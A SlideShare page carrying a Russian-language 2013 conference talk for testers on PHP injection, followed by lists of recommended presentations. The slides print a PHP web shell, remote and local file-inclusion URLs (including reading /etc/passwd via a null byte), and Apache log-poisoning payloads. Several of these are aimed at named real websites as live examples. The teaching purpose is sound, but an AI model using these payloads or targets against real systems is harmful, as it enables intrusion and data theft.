SlideShare a Scribd company logo

Тестирование безопасности: PHP инъекция

Download as PPT, PDF
SQALab
SQALab

Презентация доклада Дмитрия Мулица на конференции SQADays-14, Львов 8-9 ноября 2013

Education
1 of 40
Тестирование безопасности: PHP инъекция Тестирование безопасности: PHP инъекция Дмитрий Мулица. CTDev
Тестирование безопасности: PHP инъекция Введение Почему проблема всегда актуальна ● Захват ресурса с целью внедрения своего кода (вирусы, ссылки, баннеры) ● Хищение информации / шпионаж ● Недобросовестная конкуренция ● Спортивный интерес
Тестирование безопасности: PHP инъекция Введение Почему именно PHP Netcraft: ● 39% сайтов в интернете используют PHP ● 244 млн. сайтов используют PHP
Тестирование безопасности: PHP инъекция Общее понятие PHP-инъекция - один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне.
Тестирование безопасности: PHP инъекция Общее понятие Потенциально опасные функции: ● include() ● include_once() ● require() ● require_once() ● eval() ● create_function() ● preg_replace() ● passthru(), system(), exec(),...
Тестирование безопасности: PHP инъекция Общее понятие Использование повторяющихся кусков кода на разных страницах приводят к использованию: include() include_once() require() require_once()
Тестирование безопасности: PHP инъекция Общее понятие passthru(), system(), exec(), shell_exec, popen, proc_open Позволяют запускать стороннее приложение. Чаще всего имеется в виду – консольное.
Тестирование безопасности: PHP инъекция Общее понятие Для примера, классический Web shell shell.php: <?php system($_GET["command"]); ?>
Тестирование безопасности: PHP инъекция Общее понятие Пример использования web shell'a: Выключить windows хост-машину http://[site]/shell.php?command=shutdown -s После декодирования получается: http://[site]/shell.php?command=shutdown%20-s
Тестирование безопасности: PHP инъекция Общее понятие Готовые решения web shell'ов ● C99 Shell ● CIH.[ms] Webshell ● R57Shell ● WSO Webshell ● P.A.S. ● phpShell ● ...
Тестирование безопасности: PHP инъекция Общее понятие
Тестирование безопасности: PHP инъекция Общее понятие Основные способы передачи данных: ● GET-запросы ● POST-запросы ● Cookie ● Header-запросы ● Files
Тестирование безопасности: PHP инъекция Глобальная инъекция Глобальная инъекция – подключениe (include) кода, находящегося на другом сервере.
Тестирование безопасности: PHP инъекция Глобальная инъекция main.php: <?php if($_GET['id']) include($_GET['id']); ?> Пример использования: http://[site]/main.php?id=1.php
Тестирование безопасности: PHP инъекция Глобальная инъекция 0) http://[site]/main.php?id=1.php 1) http://[site]/main.php?id=http://[anothersite]/shell.php 2) http://[site]/main.php?id=http://[anothersite]/shell.php&command=shutdown%20-s
Тестирование безопасности: PHP инъекция Локальная инъекция Локальная инъекция - подключения (include) кода, находящегося на текущем сервере.
Тестирование безопасности: PHP инъекция Локальная инъекция http://[site]/main.php?id=[path_to_file] Действующие примеры: http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php? page=../../../../../etc/passwd%00
Тестирование безопасности: PHP инъекция "Ядовитый" ноль Нюанс в примере: http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00
Тестирование безопасности: PHP инъекция "Ядовитый" ноль Нулевой байт aka "Ядовитый" ноль = конец строки %00 - закодированный в формат URL нулевой байт.
Тестирование безопасности: PHP инъекция Локальная инъекция http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00
Тестирование безопасности: PHP инъекция Локальная инъекция http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00
Тестирование безопасности: PHP инъекция Локальная инъекция http://museum.nhm.uga.edu/index.php? page=../../../../../etc/passwd%00
Тестирование безопасности: PHP инъекция Локальная инъекция http://museum.nhm.uga.edu/index.php? page=../../../../../etc/passwd%00
Тестирование безопасности: PHP инъекция Локальная инъекция
Тестирование безопасности: PHP инъекция Загрузка файлов ● *.php ● Изменение расширения ● Модификация файла
Тестирование безопасности: PHP инъекция Загрузка файлов jpeg: <?php phpinfo(); ?>
Тестирование безопасности: PHP инъекция Загрузка файлов
Тестирование безопасности: PHP инъекция Инъекция через логи Apache'a Пример Request Headers: Accept text/html,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding gzip, deflate Accept-Language Connection ru keep-alive DNT1 Host www.confeture.com If-None-Match"dfab3f5e6cce48be79d870dc1374ccaa" Referer http://www.confeture.com/ User-Agent Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Тестирование безопасности: PHP инъекция Инъекция через логи Apache'a Referer: http://[site]/<?php passthru($_GET['command']);?> httpd-access.log: 127.0.0.1 - - [17/Aug/2013:13:52:17 +0300] "HEAD / HTTP/1.1" 200 326 "http://[site]/<? php passthru($_GET[command]); ?>" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36"
Тестирование безопасности: PHP инъекция Инъекция через логи Apache'a Примерный запрос: http://[site]/page.php? page=../../../../../../../httpd-access.log %00&command=uname+-a
Тестирование безопасности: PHP инъекция Инъекция через логи Apache'a http://www.ecwatech.ru/2014/index.php? content=../../../../../../../../../../usr/local/a pache/logs/access_log%00
Тестирование безопасности: PHP инъекция Инъекция через логи Apache'a http://citypipe.ru/index.php? content=../../../../../../../../../../usr/local/a pache/logs/access_log%00
Тестирование безопасности: PHP инъекция Рекурсия Рекурсия - вызов функции (процедуры) из неё же самой (wiki) Текущий пример: http://www.sghp.ru/index.php?page=index.php
Тестирование безопасности: PHP инъекция Рекурсия
Тестирование безопасности: PHP инъекция Способы тестирования Варианты тестирования: ● С доступом к коду ● Без доступа к коду
Тестирование безопасности: PHP инъекция Способы тестирования Варианты тестирования: ● Ручной ● Автоматический
Тестирование безопасности: PHP инъекция Способы тестирования Необходимое условие: Знать возможные способы атаки
Тестирование безопасности: PHP инъекция Автоматический поиск ● Acunetix ● RATS - Rough Auditing Tool for Security. ● RPVS - Remote PHP Vulnerability Scanner.
Тестирование безопасности: PHP инъекция Завершение Спасибо за внимание.
Тестирование безопасности: PHP инъекция Завершение Вопросы? Skype: dmulitsa E-mail: dmulitsa@gmail.com

Recommended

Cryptography
CryptographyCryptography
Cryptography
Sandip kumar
 
Random Oracle Model & Hashing - Cryptography & Network Security
Random Oracle Model & Hashing - Cryptography & Network SecurityRandom Oracle Model & Hashing - Cryptography & Network Security
Random Oracle Model & Hashing - Cryptography & Network Security
Mahbubur Rahman
 
CNS - Unit - 2 - Stream Ciphers and Block Ciphers
CNS - Unit - 2 - Stream Ciphers and Block CiphersCNS - Unit - 2 - Stream Ciphers and Block Ciphers
CNS - Unit - 2 - Stream Ciphers and Block Ciphers
Gyanmanjari Institute Of Technology
 
RSA ALGORITHM
RSA ALGORITHMRSA ALGORITHM
RSA ALGORITHMShashank Shetty
 
Fields of digital image processing slides
Fields of digital image processing slidesFields of digital image processing slides
Fields of digital image processing slides
Srinath Dhayalamoorthy
 
Topic : B ISDN
Topic : B ISDNTopic : B ISDN
Topic : B ISDN
Dr Rajiv Srivastava
 
Elliptic Curve Cryptography
Elliptic Curve CryptographyElliptic Curve Cryptography
Elliptic Curve Cryptography
Adri Jovin
 
Introduction to cryptography and types of ciphers
Introduction to cryptography and types of ciphersIntroduction to cryptography and types of ciphers
Introduction to cryptography and types of ciphers
Aswathi Nair
 

Recommended

Cryptography
CryptographyCryptography
Cryptography
Sandip kumar
 
Random Oracle Model & Hashing - Cryptography & Network Security
Random Oracle Model & Hashing - Cryptography & Network SecurityRandom Oracle Model & Hashing - Cryptography & Network Security
Random Oracle Model & Hashing - Cryptography & Network Security
Mahbubur Rahman
 
CNS - Unit - 2 - Stream Ciphers and Block Ciphers
CNS - Unit - 2 - Stream Ciphers and Block CiphersCNS - Unit - 2 - Stream Ciphers and Block Ciphers
CNS - Unit - 2 - Stream Ciphers and Block Ciphers
Gyanmanjari Institute Of Technology
 
RSA ALGORITHM
RSA ALGORITHMRSA ALGORITHM
RSA ALGORITHMShashank Shetty
 
Fields of digital image processing slides
Fields of digital image processing slidesFields of digital image processing slides
Fields of digital image processing slides
Srinath Dhayalamoorthy
 
Topic : B ISDN
Topic : B ISDNTopic : B ISDN
Topic : B ISDN
Dr Rajiv Srivastava
 
Elliptic Curve Cryptography
Elliptic Curve CryptographyElliptic Curve Cryptography
Elliptic Curve Cryptography
Adri Jovin
 
Introduction to cryptography and types of ciphers
Introduction to cryptography and types of ciphersIntroduction to cryptography and types of ciphers
Introduction to cryptography and types of ciphers
Aswathi Nair
 
Unit 3
Unit 3Unit 3
Unit 3
KRAMANJANEYULU1
 
Block Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption StandardBlock Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption Standard
Dr.Florence Dayana
 
Unit 6
Unit 6Unit 6
Unit 6
KRAMANJANEYULU1
 
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITYCS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
Kathirvel Ayyaswamy
 
The Diffie-Hellman Algorithm
The Diffie-Hellman AlgorithmThe Diffie-Hellman Algorithm
The Diffie-Hellman Algorithm
Jay Nagar
 
Lesson 1- Foundation of Cryptology
Lesson 1- Foundation of CryptologyLesson 1- Foundation of Cryptology
Lesson 1- Foundation of Cryptology
MLG College of Learning, Inc
 
Transmission media
Transmission mediaTransmission media
Transmission media
Vikas Yadav
 
Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...
Mazin Alwaaly
 
Pretty good privacy
Pretty good privacyPretty good privacy
Pretty good privacy
Punnya Babu
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit iv
ArthyR3
 
Seminar on Chaos Based Cryptography
Seminar on Chaos Based CryptographySeminar on Chaos Based Cryptography
Seminar on Chaos Based Cryptography
Muhammad Hamid
 
Topic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptxTopic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptx
UrjaDhabarde
 
Digital Signature Standard
Digital Signature StandardDigital Signature Standard
Digital Signature Standard
Sou Jana
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
Mihir Shah
 
Network Layer
Network LayerNetwork Layer
Network Layer
Rutwik Jadhav
 
Diffie hellman key exchange algorithm
Diffie hellman key exchange algorithmDiffie hellman key exchange algorithm
Diffie hellman key exchange algorithm
Sunita Kharayat
 
Rsa cryptosystem
Rsa cryptosystemRsa cryptosystem
Rsa cryptosystem
Abhishek Gautam
 
Security services and mechanisms
Security services and mechanismsSecurity services and mechanisms
Security services and mechanisms
Rajapriya82
 
Cs8792 cns - unit i
Cs8792 cns - unit iCs8792 cns - unit i
Cs8792 cns - unit i
ArthyR3
 
Digital Image Processing: Image Segmentation
Digital Image Processing: Image SegmentationDigital Image Processing: Image Segmentation
Digital Image Processing: Image Segmentation
Mostafa G. M. Mostafa
 
очир абушинов
очир абушиновочир абушинов
очир абушиновAlexei Lupan
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
Sergey Belov
 

More Related Content

What's hot

Block Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption StandardBlock Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption Standard
Dr.Florence Dayana
 
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITYCS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
Kathirvel Ayyaswamy
 
The Diffie-Hellman Algorithm
The Diffie-Hellman AlgorithmThe Diffie-Hellman Algorithm
The Diffie-Hellman Algorithm
Jay Nagar
 
Lesson 1- Foundation of Cryptology
Lesson 1- Foundation of CryptologyLesson 1- Foundation of Cryptology
Lesson 1- Foundation of Cryptology
MLG College of Learning, Inc
 
Transmission media
Transmission mediaTransmission media
Transmission media
Vikas Yadav
 
Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...
Mazin Alwaaly
 
Pretty good privacy
Pretty good privacyPretty good privacy
Pretty good privacy
Punnya Babu
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit iv
ArthyR3
 
Seminar on Chaos Based Cryptography
Seminar on Chaos Based CryptographySeminar on Chaos Based Cryptography
Seminar on Chaos Based Cryptography
Muhammad Hamid
 
Topic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptxTopic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptx
UrjaDhabarde
 
Digital Signature Standard
Digital Signature StandardDigital Signature Standard
Digital Signature Standard
Sou Jana
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
Mihir Shah
 
Network Layer
Network LayerNetwork Layer
Network Layer
Rutwik Jadhav
 
Diffie hellman key exchange algorithm
Diffie hellman key exchange algorithmDiffie hellman key exchange algorithm
Diffie hellman key exchange algorithm
Sunita Kharayat
 
Rsa cryptosystem
Rsa cryptosystemRsa cryptosystem
Rsa cryptosystem
Abhishek Gautam
 
Security services and mechanisms
Security services and mechanismsSecurity services and mechanisms
Security services and mechanisms
Rajapriya82
 
Cs8792 cns - unit i
Cs8792 cns - unit iCs8792 cns - unit i
Cs8792 cns - unit i
ArthyR3
 
Digital Image Processing: Image Segmentation
Digital Image Processing: Image SegmentationDigital Image Processing: Image Segmentation
Digital Image Processing: Image Segmentation
Mostafa G. M. Mostafa
 

What's hot (20)

Unit 3
Unit 3Unit 3
Unit 3
 
Block Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption StandardBlock Ciphers and the Data Encryption Standard
Block Ciphers and the Data Encryption Standard
 
Unit 6
Unit 6Unit 6
Unit 6
 
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITYCS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
 
The Diffie-Hellman Algorithm
The Diffie-Hellman AlgorithmThe Diffie-Hellman Algorithm
The Diffie-Hellman Algorithm
 
Lesson 1- Foundation of Cryptology
Lesson 1- Foundation of CryptologyLesson 1- Foundation of Cryptology
Lesson 1- Foundation of Cryptology
 
Transmission media
Transmission mediaTransmission media
Transmission media
 
Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...Information and data security block cipher and the data encryption standard (...
Information and data security block cipher and the data encryption standard (...
 
Pretty good privacy
Pretty good privacyPretty good privacy
Pretty good privacy
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit iv
 
Seminar on Chaos Based Cryptography
Seminar on Chaos Based CryptographySeminar on Chaos Based Cryptography
Seminar on Chaos Based Cryptography
 
Topic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptxTopic20 The RC4 Algorithm.pptx
Topic20 The RC4 Algorithm.pptx
 
Digital Signature Standard
Digital Signature StandardDigital Signature Standard
Digital Signature Standard
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
 
Network Layer
Network LayerNetwork Layer
Network Layer
 
Diffie hellman key exchange algorithm
Diffie hellman key exchange algorithmDiffie hellman key exchange algorithm
Diffie hellman key exchange algorithm
 
Rsa cryptosystem
Rsa cryptosystemRsa cryptosystem
Rsa cryptosystem
 
Security services and mechanisms
Security services and mechanismsSecurity services and mechanisms
Security services and mechanisms
 
Cs8792 cns - unit i
Cs8792 cns - unit iCs8792 cns - unit i
Cs8792 cns - unit i
 
Digital Image Processing: Image Segmentation
Digital Image Processing: Image SegmentationDigital Image Processing: Image Segmentation
Digital Image Processing: Image Segmentation
 

Viewers also liked

очир абушинов
очир абушиновочир абушинов
очир абушиновAlexei Lupan
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
Sergey Belov
 
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?Алексей Баранцев -- Какое дело тестировщикам до исходного кода?
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?sqadays8
 
Patterns in PHP
Patterns in PHPPatterns in PHP
Patterns in PHP
Diego Lewin
 
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
JSC “Arcadia Inc”
 
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайтеЯндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
revisium
 
Ciklum Odessa PHP Saturday - Dependency Injection
Ciklum Odessa PHP Saturday - Dependency InjectionCiklum Odessa PHP Saturday - Dependency Injection
Ciklum Odessa PHP Saturday - Dependency Injection
Pavel Voznenko
 
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
Dev2Dev
 
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
Ciklum Minsk
 
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)Decouple Your Code For Reusability (International PHP Conference / IPC 2008)
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)Fabien Potencier
 
Dependency Injection in PHP
Dependency Injection in PHPDependency Injection in PHP
Dependency Injection in PHP
Kacper Gunia
 
Команды из разных стран - секреты успешного тестирования и дипломатии
Команды из разных стран - секреты успешного тестирования и дипломатииКоманды из разных стран - секреты успешного тестирования и дипломатии
Команды из разных стран - секреты успешного тестирования и дипломатии
SQALab
 
Рефакторинг - на позитиве
Рефакторинг - на позитивеРефакторинг - на позитиве
Рефакторинг - на позитиве
SQALab
 
Тестировщик на территории заказчика
Тестировщик на территории заказчика Тестировщик на территории заказчика
Тестировщик на территории заказчика
SQALab
 
Особенности тестирования NoSQL приложений
Особенности тестирования NoSQL приложенийОсобенности тестирования NoSQL приложений
Особенности тестирования NoSQL приложений
SQALab
 
Why I do not like to be a tester in Agile project?
Why I do not like to be a tester in Agile project?Why I do not like to be a tester in Agile project?
Why I do not like to be a tester in Agile project?
SQALab
 
The evolution of QA at JUST EAT
The evolution of QA at JUST EATThe evolution of QA at JUST EAT
The evolution of QA at JUST EAT
SQALab
 
How software that runs Wikipedia is tested
How software that runs Wikipedia is tested How software that runs Wikipedia is tested
How software that runs Wikipedia is tested
SQALab
 
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
SQALab
 
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджера
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджераРабота с подчиненными. 4 скрытых типовых проблем поведения менеджера
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджера
SQALab
 

Viewers also liked (20)

очир абушинов
очир абушиновочир абушинов
очир абушинов
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
 
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?Алексей Баранцев -- Какое дело тестировщикам до исходного кода?
Алексей Баранцев -- Какое дело тестировщикам до исходного кода?
 
Patterns in PHP
Patterns in PHPPatterns in PHP
Patterns in PHP
 
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
2015-12-12 | AzovDevMeetup 2015 | Enterprise приложения на PHP | Павел Крынецкий
 
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайтеЯндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
Яндекс.Вебмастерская №3: как найти вирусы и вредоносный код на сайте
 
Ciklum Odessa PHP Saturday - Dependency Injection
Ciklum Odessa PHP Saturday - Dependency InjectionCiklum Odessa PHP Saturday - Dependency Injection
Ciklum Odessa PHP Saturday - Dependency Injection
 
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
Dependency Injection. Как сказать всё, не говоря ничего. Кожевников Дмитрий. ...
 
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
Dependency Injection Pattern in JavaScript, Speakers' Corner by Evgeny Dmitri...
 
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)Decouple Your Code For Reusability (International PHP Conference / IPC 2008)
Decouple Your Code For Reusability (International PHP Conference / IPC 2008)
 
Dependency Injection in PHP
Dependency Injection in PHPDependency Injection in PHP
Dependency Injection in PHP
 
Команды из разных стран - секреты успешного тестирования и дипломатии
Команды из разных стран - секреты успешного тестирования и дипломатииКоманды из разных стран - секреты успешного тестирования и дипломатии
Команды из разных стран - секреты успешного тестирования и дипломатии
 
Рефакторинг - на позитиве
Рефакторинг - на позитивеРефакторинг - на позитиве
Рефакторинг - на позитиве
 
Тестировщик на территории заказчика
Тестировщик на территории заказчика Тестировщик на территории заказчика
Тестировщик на территории заказчика
 
Особенности тестирования NoSQL приложений
Особенности тестирования NoSQL приложенийОсобенности тестирования NoSQL приложений
Особенности тестирования NoSQL приложений
 
Why I do not like to be a tester in Agile project?
Why I do not like to be a tester in Agile project?Why I do not like to be a tester in Agile project?
Why I do not like to be a tester in Agile project?
 
The evolution of QA at JUST EAT
The evolution of QA at JUST EATThe evolution of QA at JUST EAT
The evolution of QA at JUST EAT
 
How software that runs Wikipedia is tested
How software that runs Wikipedia is tested How software that runs Wikipedia is tested
How software that runs Wikipedia is tested
 
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
How to manoeuvre as test/QA responsible in agile teams to get the "right" pro...
 
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджера
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджераРабота с подчиненными. 4 скрытых типовых проблем поведения менеджера
Работа с подчиненными. 4 скрытых типовых проблем поведения менеджера
 

Similar to Тестирование безопасности: PHP инъекция

Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновение
beched
 
Web осень 2013 лекция 5
Web осень 2013 лекция 5Web осень 2013 лекция 5
Web осень 2013 лекция 5Technopark
 
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийсовременная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийSergey Belov
 
Компиляция скриптов PHP. Алексей Романенко
Компиляция скриптов PHP. Алексей РоманенкоКомпиляция скриптов PHP. Алексей Романенко
Компиляция скриптов PHP. Алексей РоманенкоFuenteovejuna
 
Serghei Iakovlev "Chaos engineering in action"
Serghei Iakovlev "Chaos engineering in action"Serghei Iakovlev "Chaos engineering in action"
Serghei Iakovlev "Chaos engineering in action"
Fwdays
 
SibirCTF 2016. Практические методы защиты веб-приложений
SibirCTF 2016. Практические методы защиты веб-приложенийSibirCTF 2016. Практические методы защиты веб-приложений
SibirCTF 2016. Практические методы защиты веб-приложений
Denis Kolegov
 
Безопасность сайта: мифы и реальность — Петр Волков
Безопасность сайта: мифы и реальность — Петр ВолковБезопасность сайта: мифы и реальность — Петр Волков
Безопасность сайта: мифы и реальность — Петр Волков
Yandex
 
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
DevPoint Kyiv
 
TestGuy - эмулируем вашего тестировщика
TestGuy - эмулируем вашего тестировщикаTestGuy - эмулируем вашего тестировщика
TestGuy - эмулируем вашего тестировщикаdavertmik
 
Преимущества PHP 7: от D7 до новой виртуальной машины
Преимущества PHP 7: от D7 до новой виртуальной машиныПреимущества PHP 7: от D7 до новой виртуальной машины
Преимущества PHP 7: от D7 до новой виртуальной машины
1С-Битрикс
 
SibeCrypt 2016. Практические методы защиты веб-приложений
SibeCrypt 2016. Практические методы защиты веб-приложенийSibeCrypt 2016. Практические методы защиты веб-приложений
SibeCrypt 2016. Практические методы защиты веб-приложений
Denis Kolegov
 
Компиляция скриптов PHP (Алексей Романенко)
Компиляция скриптов PHP (Алексей Романенко)Компиляция скриптов PHP (Алексей Романенко)
Компиляция скриптов PHP (Алексей Романенко)Ontico
 
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Egor Konovalov
 
Андрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьАндрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальность
Yandex
 
Защита сайта от взлома и вирусов
Защита сайта от взлома и вирусовЗащита сайта от взлома и вирусов
Защита сайта от взлома и вирусов
SkillFactory
 
Easy selenium test automation on python
Easy selenium test automation on pythonEasy selenium test automation on python
Easy selenium test automation on python
Mykhailo Poliarush
 
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...it-people
 
Alexander manuhin selenium_php_v2.0
Alexander manuhin selenium_php_v2.0Alexander manuhin selenium_php_v2.0
Alexander manuhin selenium_php_v2.0
matroskin1980
 
Спецификация WSGI (PEP-333)
Спецификация WSGI (PEP-333)Спецификация WSGI (PEP-333)
Спецификация WSGI (PEP-333)
lectureswww lectureswww
 

Similar to Тестирование безопасности: PHP инъекция (20)

Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновение
 
Web осень 2013 лекция 5
Web осень 2013 лекция 5Web осень 2013 лекция 5
Web осень 2013 лекция 5
 
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийсовременная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложений
 
Компиляция скриптов PHP. Алексей Романенко
Компиляция скриптов PHP. Алексей РоманенкоКомпиляция скриптов PHP. Алексей Романенко
Компиляция скриптов PHP. Алексей Романенко
 
Serghei Iakovlev "Chaos engineering in action"
Serghei Iakovlev "Chaos engineering in action"Serghei Iakovlev "Chaos engineering in action"
Serghei Iakovlev "Chaos engineering in action"
 
SibirCTF 2016. Практические методы защиты веб-приложений
SibirCTF 2016. Практические методы защиты веб-приложенийSibirCTF 2016. Практические методы защиты веб-приложений
SibirCTF 2016. Практические методы защиты веб-приложений
 
Безопасность сайта: мифы и реальность — Петр Волков
Безопасность сайта: мифы и реальность — Петр ВолковБезопасность сайта: мифы и реальность — Петр Волков
Безопасность сайта: мифы и реальность — Петр Волков
 
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
DevPoint 2016: Признаки плохого кода и как с ним бороться в PHP проектах - Па...
 
TestGuy - эмулируем вашего тестировщика
TestGuy - эмулируем вашего тестировщикаTestGuy - эмулируем вашего тестировщика
TestGuy - эмулируем вашего тестировщика
 
Преимущества PHP 7: от D7 до новой виртуальной машины
Преимущества PHP 7: от D7 до новой виртуальной машиныПреимущества PHP 7: от D7 до новой виртуальной машины
Преимущества PHP 7: от D7 до новой виртуальной машины
 
